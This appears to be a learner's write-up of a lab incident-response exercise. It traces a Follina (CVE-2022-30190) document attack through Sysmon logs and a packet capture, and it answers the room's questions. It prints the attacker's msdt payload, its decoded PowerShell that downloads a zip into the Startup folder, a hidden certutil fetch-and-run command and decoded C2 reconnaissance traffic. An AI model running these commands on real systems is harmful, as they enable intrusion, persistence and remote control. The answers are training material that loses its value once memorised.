Tempest

You are tasked to conduct an investigation from a workstation affected by a full attack chain.

Introduction

Start Machine

This room aims to introduce the process of analysing endpoint and network logs from a compromised asset. Given the artefacts, we will aim to uncover the incident from the Tempest machine. In this scenario, you will be tasked to be one of the Incident Responders that will focus on handling and analysing the captured artefacts of a compromised machine.

Prerequisites

Before we start, this room requires basic knowledge of endpoint and network security analysis. It is highly recommended to go through the following rooms before attempting this challenge.

Investigation Environment

For this incident, we have provided a Windows machine at your disposal. You may deploy the machine by clicking the Start Machine button in the upper-right-hand corner of the task.

Note: The machine takes a minute to initialise. You may start accessing it once the IP address has been provided.

The machine will start in a split-screen view. In case the VM is not visible, use the blue Show Split View button at the top-right of the page.

Lastly, you may use the following information if you prefer accessing the machine via RDP:

Machine IP: MACHINE_IP

User: user

Pass: Investigatem3!

Answer the questions below

┌──(witty㉿kali)-[~/Downloads]
└─$ xfreerdp /v:10.10.253.116 /u:user /p:Investigatem3! /cert:ignore +clipboard /dynamic-resolution /drive:share,/tmp /size:85%

I have successfully connected to the Virtual Machine.

Completed

Preparation - Log Analysis

Before we proceed, let's have a quick refresher regarding these topics, which may help build a methodology for analysing captured events:

Log Analysis
Event Correlation

Log Analysis

Log analysis is the process of understanding events generated by a computer to identify anomalies such as security threats, application bugs, system performance, or other risks that may impact the organisation.

A log file is an audit trail of events or activities within the applications and systems of an organisation. Logs automatically audit any activity configured, such as system messages, authentication attempts, and network traffic generated. In addition, every log entry is audited with a timestamp of when the event occurred, which deeply aids in an investigation.

Event Correlation

Event correlation identifies significant relationships from multiple log sources, such as application logs, endpoint logs, and network logs.

Event correlation deals with identifying significant artefacts co-existing from different log sources and connecting each related artefact. For example, a network connection log may exist in various log sources, such as Sysmon logs (Event ID 3: Network Connection) and Firewall logs. Firewall logs may provide the source and destination IP, source and destination port, protocol, and the action taken. In contrast, Sysmon logs may give the process that invoked the network connection and the user running the process.

With this information, we can connect the dots of each artefact from the two data sources:

Source and Destination IP
Source and Destination Port
Action Taken
Protocol
Process name
User Account
Machine Name

Event correlation can build the puzzle pieces to complete the exact scenario from an investigation.

Answer the questions below

I have read and understood the concept of Log Analysis and Event Correlation.

Completed

Preparation - Tools and Artifacts

In this task, we will prepare the artefacts and introduce the tools needed for the investigation.

Compare by hash

Before conducting the investigation, one of the most important steps is to compare the artefacts by their hashes. It is a common practice to verify if the artefacts are expected as it is.

You can get the hashes of each artefact by running Powershell from the taskbar and executing the following commands:

powershell.exe

PS C:\Users\user> cd '.\Desktop\Incident Files\'

powershell.exe

PS C:\Users\user\Desktop\Incident Files> ls


    Directory: C:\Users\user\Desktop\Incident Files


Mode                LastWriteTime         Length Name
––––                –––––––––––––         –––––– ––––
–a––––        6/21/2022   1:46 AM       17479060 capture.pcapng
–a––––        6/21/2022   1:30 AM        3215360 sysmon.evtx
–a––––        6/21/2022   1:29 AM        1118208 windows.evtx

powershell.exe

PS C:\Users\user\Desktop\Incident Files> Get-FileHash -Algorithm SHA256 .\capture.pcapng

Algorithm       Hash                                                                   Path
–––––––––       ––––                                                                   ––––
SHA256          CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6       C:\Users\user\...

Toolset

The toolset needed for this task is focused on analysing Sysmon Logs, Windows Event Logs, and Packet Capture.

Endpoint Logs

To analyse Windows artefacts such as Windows Event Logs and Sysmon logs, we will use the following tools:

EvtxEcmd
Timeline Explorer
SysmonView
Event Viewer

Network Logs

To analyse the provided packet capture, we will use the following tools:

Wireshark
Brim

Note: You can access the tools listed above via the taskbar.

Since some of the tools listed above such as Wireshark, Brim, Event Viewer are already covered by the prerequisite rooms, we will only cover the new ones in this section.

EvtxEcmd & Timeline Explorer

Eric Zimmerman has created a set of forensic tools used to analyse Windows artefacts called EZTools (Eric Zimmerman's Tools). For this task, we will focus on EvtxEcmd and Timeline Explorer, as these tools are mainly used for parsing and analysing Evtx logs.

EvtxEcmd is a command-line tool which parses Windows Event Logs into different formats such as CSV, JSON, XML, etc. You may use this tool in conjunction with Timeline Explorer, created by the same author. Timeline Explorer is a GUI-based tool that functions as a data filtering and navigating application to ease incident responders in handling raw data.

To parse the provided logs, we need first to convert the EVTX logs into CSV using EvtxEcmd and then feed it into Timeline Explorer.

powershell.exe

PS C:\Tools\EvtxECmd> .\EvtxECmd.exe -f 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' --csv 'C:\Users\user\Desktop\Incident Files' --csvf sysmon.csv
EvtxECmd version 1.0.0.0

Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/evtx

Command line: -f C:\Users\user\Desktop\Incident Files\sysmon.evtx --csv C:\Users\user\Desktop\Incident Files --csvf sysmon.csv

Warning: Administrator privileges not found!

CSV output will be saved to C:\Users\user\Desktop\Incident Files\sysmon.csv

Maps loaded: 383

Processing C:\Users\user\Desktop\Incident Files\sysmon.evtx...
Chunk count: 42, Iterating records...

Event log details
Flags: None
Chunk count: 42
Stored/Calculated CRC: EAFDE57A/EAFDE57A
Earliest timestamp: 1601-01-01 00:00:00.0000000
Latest timestamp:   2022-06-20 17:30:35.3630890
Total event log records found: 2,559

Records included: 2,559 Errors: 0 Events dropped: 0

Metrics (including dropped events)
Event ID        Count
1               238
2               2
3               92
5               3
8               3
11              1,024
12              186
13              869
15              6
22              136

Processed 1 file in 19.8850 seconds

For TimelineExplorer.exe, we can load the exported CSV file by doing the following: File > Open > Choose sysmon.csv from C:\Users\user\Desktop\Incident Files directory

Once the logs are loaded, you may navigate through each column and use the input field to filter specific logs via a unique string.

Lastly, you may use the search feature in the upper right-hand corner to find a unique string that may exist on any column.

SysmonView

SysmonView is a Windows GUI-based tool that visualises Sysmon Logs.

Before using this tool, we must export the log file's contents into XML via Event Viewer.

The machine will notify you once the file has been successfully exported.

Usage:

Go to File > Import Sysmon Event Logs then choose the XML files generated using the Event Viewer.
Once loaded, the left sidebar has search functionality that can filter a specific process in mind.
Choose the image path and session GUID to render the mapped view.

This tool can easily view the correlated events from a specific process. The example above summarises all Sysmon events related to explorer.exe.

Answer the questions below

PS C:\Users\user\Desktop\Incident Files> Get-FileHash -Algorithm SHA256 *

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6       C:\Users\user\Desktop\Incident Files\capture.pcapng
SHA256          665DC3519C2C235188201B5A8594FEA205C3BCBC75193363B87D2837ACA3C91F       C:\Users\user\Desktop\Incident Files\sysmon.evtx
SHA256          D0279D5292BC5B25595115032820C978838678F4333B725998CFE9253E186D60       C:\Users\user\Desktop\Incident Files\windows.evtx

using tools from Eric

PS C:\Users\user\Desktop\Incident Files> cd 'C:\Tools\EvtxECmd'
PS C:\Tools\EvtxECmd> .\EvtxECmd.exe -f 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' --csv
Required argument missing for option: '--csv'.

Description:
  EvtxECmd version 1.0.0.0

  Author: Eric Zimmerman (saericzimmerman@gmail.com)
  https://github.com/EricZimmerman/evtx

  Examples: EvtxECmd.exe -f "C:\Temp\Application.evtx" --csv "c:\temp\out" --csvf MyOutputFile.csv
            EvtxECmd.exe -f "C:\Temp\Application.evtx" --csv "c:\temp\out"
            EvtxECmd.exe -f "C:\Temp\Application.evtx" --json "c:\temp\jsonout"

            Short options (single letter) are prefixed with a single dash. Long commands are prefixed with two dashes

Usage:
  EvtxECmd [options]

Options:
  -f <f>           File to process. This or -d is required
  -d <d>           Directory to process that contains evtx files. This or -f is required
  --csv <csv>      Directory to save CSV formatted results to
  --csvf <csvf>    File name to save CSV formatted results to. When present, overrides default name
  --json <json>    Directory to save JSON formatted results to
  --jsonf <jsonf>  File name to save JSON formatted results to. When present, overrides default name
  --xml <xml>      Directory to save XML formatted results to
  --xmlf <xmlf>    File name to save XML formatted results to. When present, overrides default name
  --dt <dt>        The custom date/time format to use when displaying time stamps [default: yyyy-MM-dd HH:mm:ss.fffffff]
  --inc <inc>      List of Event IDs to process. All others are ignored. Overrides --exc Format is 4624,4625,5410
  --exc <exc>      List of Event IDs to IGNORE. All others are included. Format is 4624,4625,5410
  --sd <sd>        Start date for including events (UTC). Anything OLDER than this is dropped. Format should match --dt
  --ed <ed>        End date for including events (UTC). Anything NEWER than this is dropped. Format should match --dt
  --fj             When true, export all available data when using --json [default: False]
  --tdt <tdt>      The number of seconds to use for time discrepancy detection [default: 1]
  --met            When true, show metrics about processed event log [default: True]
  --maps <maps>    The path where event maps are located. Defaults to 'Maps' folder where program was executed
                   [default: C:\Tools\EvtxECmd\Maps]
  --vss            Process all Volume Shadow Copies that exist on drive specified by -f or -d [default: False]
  --dedupe         Deduplicate -f or -d & VSCs based on SHA-1. First file found wins [default: True]
  --sync           If true, the latest maps from https://github.com/EricZimmerman/evtx/tree/master/evtx/Maps are
                   downloaded and local maps updated [default: False]
  --debug          Show debug information during processing [default: False]
  --trace          Show trace information during processing [default: False]
  --version        Show version information
  -?, -h, --help   Show help and usage information


PS C:\Tools\EvtxECmd> .\EvtxECmd.exe -f 'C:\Users\user\Desktop\Incident Files\sysmon.evtx' --csv 'C:\Users\user\Desktop\Incident Files' --csvf sysmon.csv
EvtxECmd version 1.0.0.0

Author: Eric Zimmerman (saericzimmerman@gmail.com)
https://github.com/EricZimmerman/evtx

Command line: -f C:\Users\user\Desktop\Incident Files\sysmon.evtx --csv C:\Users\user\Desktop\Incident Files --csvf sysmon.csv

Warning: Administrator privileges not found!

CSV output will be saved to C:\Users\user\Desktop\Incident Files\sysmon.csv

Maps loaded: 383

Processing C:\Users\user\Desktop\Incident Files\sysmon.evtx...
Chunk count: 42, Iterating records...

Event log details
Flags: None
Chunk count: 42
Stored/Calculated CRC: EAFDE57A/EAFDE57A
Earliest timestamp: 1601-01-01 00:00:00.0000000
Latest timestamp:   2022-06-20 17:30:35.3630890
Total event log records found: 2,559

Records included: 2,559 Errors: 0 Events dropped: 0

Metrics (including dropped events)
Event ID        Count
1               238
2               2
3               92
5               3
8               3
11              1,024
12              186
13              869
15              6
22              136

Processed 1 file in 7.3504 seconds

Now can proccess with TimelineExplorer.exe

Computer TEMPEST

Now using SysmonView

we must export the log file's contents into XML via Event Viewer

wait till get a msg successfully

What is the SHA256 hash of the capture.pcapng file?

CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6

What is the SHA256 hash of the sysmon.evtx file?

665DC3519C2C235188201B5A8594FEA205C3BCBC75193363B87D2837ACA3C91F

What is the SHA256 hash of the windows.evtx file?

D0279D5292BC5B25595115032820C978838678F4333B725998CFE9253E186D60

Initial Access - Malicious Document

Tempest Incident

In this incident, you will act as an Incident Responder from an alert triaged by one of your Security Operations Center analysts. The analyst has confirmed that the alert has a CRITICAL severity that needs further investigation.

As reported by the SOC analyst, the intrusion started from a malicious document. In addition, the analyst compiled the essential information generated by the alert as listed below:

The malicious document has a .doc extension.
The user downloaded the malicious document via chrome.exe.
The malicious document then executed a chain of commands to attain code execution.

Investigation Guide

To aid with the investigation, you may refer to the cheatsheet crafted by the team applicable to this scenario:

Start with the events generated by Sysmon.
EvtxEcmd, Timeline Explorer, and SysmonView can interpret Sysmon logs.
Follow the child processes of WinWord.exe.
Use filters such as ParentProcessID or ProcessID to correlate the relationship of each process.
We can focus on Sysmon events such as Process Creation (Event ID 1) and DNS Queries (Event ID 22) to correlate the activity generated by the malicious document.

Significant Data Sources:

Sysmon

Answer the questions below

Using TimeLine Explorer
search WinWord.exe

{"EventData":{"Data":[{"@Name":"RuleName","#text":"Downloads"},{"@Name":"UtcTime","#text":"2022-06-20 17:13:14.228"},{"@Name":"ProcessGuid","#text":"4bbef3ae-aaa8-62b0-2e0a-000000000700"},{"@Name":"ProcessId","#text":"496"},{"@Name":"Image","#text":"C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\WINWORD.EXE"},{"@Name":"TargetFilename","#text":"C:\\Users\\benimaru\\Downloads\\~$ee_magicules.doc"},{"@Name":"CreationUtcTime","#text":"2022-06-20 17:13:14.228"},{"@Name":"User","#text":"TEMPEST\\benimaru"}]}}

DestinationIp: 167.71.199.191

QueryName: phishteam.xyz

There's an easy way just searching base64 :)

C:\Windows\SysWOW64\msdt.exe ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"

Look ms-msdt

┌──(witty㉿kali)-[~/Downloads]
└─$ echo "JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg==" | base64 -d
$app=[Environment]::GetFolderPath('ApplicationData');cd "$app\Microsoft\Windows\Start Menu\Programs\Startup"; iwr http://phishteam.xyz/02dcf07/update.zip -outfile update.zip; Expand-Archive .\update.zip -DestinationPath .; rm update.zip;

https://superuser.com/questions/1727392/follina-msdt-vuln-cve-2022-30190-who-is-executing-the-powershell-cvommand

https://wazuh.com/blog/detecting-follina-cve-2022-30190-attack-with-wazuh/

Follina

The user of this machine was compromised by a malicious document. What is the file name of the document?

ee_magicules.doc

What is the name of the compromised user and machine?

Format: username-machine name

benimaru-TEMPEST

What is the PID of the Microsoft Word process that opened the malicious document?

496

Based on Sysmon logs, what is the IPv4 address resolved by the malicious domain used in the previous question?

167.71.199.191

What is the base64 encoded string in the malicious payload executed by the document?

*JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg==*

What is the CVE number of the exploit used by the attacker to achieve a remote code execution?

External research needed. Observe the parent-child relationship of Winword.exe and the process that executed the malicious base64 payload.

Format: XXXX-XXXXX

2022-30190

Initial Access - Stage 2 execution

Malicious Document - Stage 2

Based on the initial findings, we discovered that there is a stage 2 execution:

The document has successfully executed an encoded base64 command.
Decoding this string reveals the exact command chain executed by the malicious document.

Investigation Guide

With the following discoveries, we may refer again to the cheatsheet to continue with the investigation:

The Autostart execution reflects explorer.exe as its parent process ID.
Child processes of explorer.exe within the event timeframe could be significant.
Process Creation (Event ID 1) and File Creation (Event ID 11) succeeding the document execution are worth checking.

Significant Data Sources:

Sysmon

Answer the questions below

appdata environment variable

The default value of the environment variable APPDATA is **C:\Users\username\AppData\Roaming**.

C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

search explorer.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe

filter by event id 1 then search first.exe

"C:\Users\Public\Downloads\first.exe"

MD5=C9AA36F483B61CFA9758C44ACDB776AC,SHA256=CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8,IMPHASH=468991D410EEFBCFB478FB910DDA2CE2

unfilter event id 1 then search first.exe

QueryName: resolvecyber.xyz

now we need to know wich port use it

using brim & wireshark

upload capture.pcapng

Queries HTTP requests

_path=="http" | cut id.orig_h, id.resp_h, id.resp_p, method, host, uri | uniq -c

and filter by

_path=="http" "resolvecyber.xyz" | cut id.orig_h, id.resp_h, id.resp_p, method, host, uri | uniq -c 

there are 2 ports 8080 and 80

resolvecyber.xyz:80

The malicious execution of the payload wrote a file on the system. What is the full target path of the payload?

The AppData environment variable can be simplified.

*C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup*

The implanted payload executes once the user logs into the machine. What is the executed command upon a successful login of the compromised user?

Format: Remove the double quotes from the log.

*"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe*

Based on Sysmon logs, what is the SHA256 hash of the malicious binary downloaded for stage 2 execution?

CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8

The stage 2 payload downloaded establishes a connection to a c2 server. What is the domain and port used by the attacker?

Format: domain:port

resolvecyber.xyz:80

Initial Access - Malicious Document Traffic

Malicious Document Traffic

Based on the collected findings, we discovered that the attacker fetched the stage 2 payload remotely:

We discovered the Domain and IP invoked by the malicious document on Sysmon logs.
There is another domain and IP used by the stage 2 payload logged from the same data source.

Investigation Guide

Since we have discovered network-related artefacts, we may again refer to our cheatsheet, which focuses on Network Log Analysis:

We can now use Brim and Wireshark to investigate the packet capture.
Find network events related to the harvested domains and IP addresses.
Sample Brim filter that you can use for this investigation: _path=="http" "<malicious domain>"

Data Sources:

Packet Capture

Answer the questions below

/9ab62b5?q=cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K

from base64

pwd - 
Path               
----               
C:\Windows\system32

_path=="http" "phishteam.xyz" | sort ts

host
phishteam.xyz
uri
/02dcf07/index.html

http://phishteam.xyz/02dcf07/index.html

_path=="http" "resolvecyber.xyz" 

?q=

method
GET
host
resolvecyber.xyz
uri
/9ab62b5?q=bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYX

Nim httpclient/1.6.6

What is the URL of the malicious payload embedded in the document?

*http://phishteam.xyz/02dcf07/index.html*

What is the encoding used by the attacker on the c2 connection?

base64

The malicious c2 binary sends a payload using a parameter that contains the executed command results. What is the parameter used by the binary?

The malicious c2 binary connects to a specific URL to get the command to be executed. What is the URL used by the binary?

/9ab62b5

What is the HTTP method used by the binary?

GET

Based on the user agent, what programming language was used by the attacker to compile the binary?

Format: Answer in lowercase

Nim

Discovery - Internal Reconnaissance

Internal Reconnaissance

Based on the collected findings, we have discovered that the malicious binary continuously uses the C2 traffic:

We can easily decode the encoded string in the network traffic.
The traffic contains the command and output executed by the attacker.

Investigation Guide

To continue with the investigation, we may focus on the following information:

Find network and process events connecting to the malicious domain.
Find network events that contain an encoded command.
We can use Brim to filter all packets containing the encoded string.
Look for endpoint enumeration commands since the attacker is already inside the machine.

In addition, we may refer to our cheatsheet for Brim to quickly investigate the encoded traffic with the following filters:

To get all HTTP requests related to the malicious C2 traffic: _path=="http" "<replace domain>" id.resp_p==<replace port> | cut ts, host, id.resp_p, uri | sort ts

Significant Data Sources:

Packet Capture
Sysmon

Answer the questions below

_path=="http" "<replace domain>" id.resp_p==<replace port> | cut ts, host, id.resp_p, uri | sort ts

d2hvYW1pIC0gdGVtcGVzdFxiZW5pbWFydQ0K

whoami - tempest\benimaru

cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K

pwd - 
Path               
----               
C:\Windows\system32

ZGlyIEM6XFVzZXJzIC0gDQoNCiAgICBEaXJlY3Rvcnk6IEM6XFVzZXJzDQoNCg0KTW9kZSAgICAgICAgICAgICAgICBMYXN0V3JpdGVUaW1lICAgICAgICAgTGVuZ3RoIE5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgIC0tLS0tLS0tLS0tLS0gICAgICAgICAtLS0tLS0gLS0tLSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCmQtLS0tLSAgICAgICAgNi8yMC8yMDIyICAgOTowNiBQTSAgICAgICAgICAgICAgICBiZW5pbWFydSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KZC1yLS0tICAgICAgICA2LzIwLzIwMjIgICA0OjAzIFBNICAgICAgICAgICAgICAgIFB1YmxpYyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQpkLS0tLS0gICAgICAgIDYvMjAvMjAyMiAgMTE6NTIgUE0gICAgICAgICAgICAgICAgcmltdXJ1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCg0KDQo=

dir C:\Users - 

    Directory: C:\Users


Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
d-----        6/20/2022   9:06 PM                benimaru                                                               
d-r---        6/20/2022   4:03 PM                Public                                                                 
d-----        6/20/2022  11:52 PM                rimuru  

bmV0IHVzZXJzIC0gDQpVc2VyIGFjY291bnRzIGZvciBcXFRFTVBFU1QNCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KQWRtaW5pc3RyYXRvciAgICAgICAgICAgIGJlbmltYXJ1ICAgICAgICAgICAgICAgICBEZWZhdWx0QWNjb3VudCAgICAgICAgICAgDQpHdWVzdCAgICAgICAgICAgICAgICAgICAgcmltdXJ1ICAgICAgICAgICAgICAgICAgIFdEQUdVdGlsaXR5QWNjb3VudCAgICAgICANClRoZSBjb21tYW5kIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHkuDQoNCg==

net users - 
User accounts for \\TEMPEST

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   WDAGUtilityAccount       
The command completed successfully.

bmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMgLSBBbGlhcyBuYW1lICAgICBhZG1pbmlzdHJhdG9ycw0KQ29tbWVudCAgICAgICAgQWRtaW5pc3RyYXRvcnMgaGF2ZSBjb21wbGV0ZSBhbmQgdW5yZXN0cmljdGVkIGFjY2VzcyB0byB0aGUgY29tcHV0ZXIvZG9tYWluDQoNCk1lbWJlcnMNCg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KQWRtaW5pc3RyYXRvcg0KcmltdXJ1DQpUaGUgY29tbWFuZCBjb21wbGV0ZWQgc3VjY2Vzc2Z1bGx5Lg0KDQo=

net localgroup administrators - Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
rimuru
The command completed successfully.


bmV0IHVzZXIgYmVuaW1hcnUgLSBVc2VyIG5hbWUgICAgICAgICAgICAgICAgICAgIGJlbmltYXJ1DQpGdWxsIE5hbWUgICAgICAgICAgICAgICAgICAgIA0KQ29tbWVudCAgICAgICAgICAgICAgICAgICAgICANClVzZXIncyBjb21tZW50ICAgICAgICAgICAgICAgDQpDb3VudHJ5L3JlZ2lvbiBjb2RlICAgICAgICAgIDAwMCAoU3lzdGVtIERlZmF1bHQpDQpBY2NvdW50IGFjdGl2ZSAgICAgICAgICAgICAgIFllcw0KQWNjb3VudCBleHBpcmVzICAgICAgICAgICAgICBOZXZlcg0KDQpQYXNzd29yZCBsYXN0IHNldCAgICAgICAgICAgIDYvMjAvMjAyMiA5OjE4OjA0IFBNDQpQYXNzd29yZCBleHBpcmVzICAgICAgICAgICAgIE5ldmVyDQpQYXNzd29yZCBjaGFuZ2VhYmxlICAgICAgICAgIDYvMjAvMjAyMiA5OjE4OjA0IFBNDQpQYXNzd29yZCByZXF1aXJlZCAgICAgICAgICAgIE5vDQpVc2VyIG1heSBjaGFuZ2UgcGFzc3dvcmQgICAgIFllcw0KDQpXb3Jrc3RhdGlvbnMgYWxsb3dlZCAgICAgICAgIEFsbA0KTG9nb24gc2NyaXB0ICAgICAgICAgICAgICAgICANClVzZXIgcHJvZmlsZSAgICAgICAgICAgICAgICAgDQpIb21lIGRpcmVjdG9yeSAgICAgICAgICAgICAgIA0KTGFzdCBsb2dvbiAgICAgICAgICAgICAgICAgICA2LzIxLzIwMjIgMToxNDo0OSBBTQ0KDQpMb2dvbiBob3VycyBhbGxvd2VkICAgICAgICAgIEFsbA0KDQpMb2NhbCBHcm91cCBNZW1iZXJzaGlwcyAgICAgICpSZW1vdGUgTWFuYWdlbWVudCBVc2UqVXNlcnMgICAgICAgICAgICAgICAgDQpHbG9iYWwgR3JvdXAgbWVtYmVyc2hpcHMgICAgICpOb25lICAgICAgICAgICAgICAgICANClRoZSBjb21tYW5kIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHkuDQoNCg==

net user benimaru - User name                    benimaru
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/20/2022 9:18:04 PM
Password expires             Never
Password changeable          6/20/2022 9:18:04 PM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   6/21/2022 1:14:49 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*Users                
Global Group memberships     *None                 
The command completed successfully.

ZGlyIEM6XFVzZXJzXGJlbmltYXJ1IC0gDQoNCiAgICBEaXJlY3Rvcnk6IEM6XFVzZXJzXGJlbmltYXJ1DQoNCg0KTW9kZSAgICAgICAgICAgICAgICBMYXN0V3JpdGVUaW1lICAgICAgICAgTGVuZ3RoIE5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgIC0tLS0tLS0tLS0tLS0gICAgICAgICAtLS0tLS0gLS0tLSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCmQtci0tLSAgICAgICAgNi8yMC8yMDIyICAgNDoxMyBQTSAgICAgICAgICAgICAgICAzRCBPYmplY3RzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KZC1yLS0tICAgICAgICA2LzIwLzIwMjIgICA0OjEzIFBNICAgICAgICAgICAgICAgIENvbnRhY3RzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQpkLXItLS0gICAgICAgIDYvMjEvMjAyMiAgMTI6MjcgQU0gICAgICAgICAgICAgICAgRGVza3RvcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCmQtci0tLSAgICAgICAgNi8yMC8yMDIyICAgOToyMCBQTSAgICAgICAgICAgICAgICBEb2N1bWVudHMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KZC1yLS0tICAgICAgICA2LzIxLzIwMjIgICAxOjEzIEFNICAgICAgICAgICAgICAgIERvd25sb2FkcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQpkLXItLS0gICAgICAgIDYvMjAvMjAyMiAgIDQ6MTMgUE0gICAgICAgICAgICAgICAgRmF2b3JpdGVzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCmQtci0tLSAgICAgICAgNi8yMC8yMDIyICAgNDoxMyBQTSAgICAgICAgICAgICAgICBMaW5rcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KZC1yLS0tICAgICAgICA2LzIwLzIwMjIgICA0OjEzIFBNICAgICAgICAgICAgICAgIE11c2ljICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQpkYXItLS0gICAgICAgIDYvMjEvMjAyMiAgIDE6MTUgQU0gICAgICAgICAgICAgICAgT25lRHJpdmUgICAg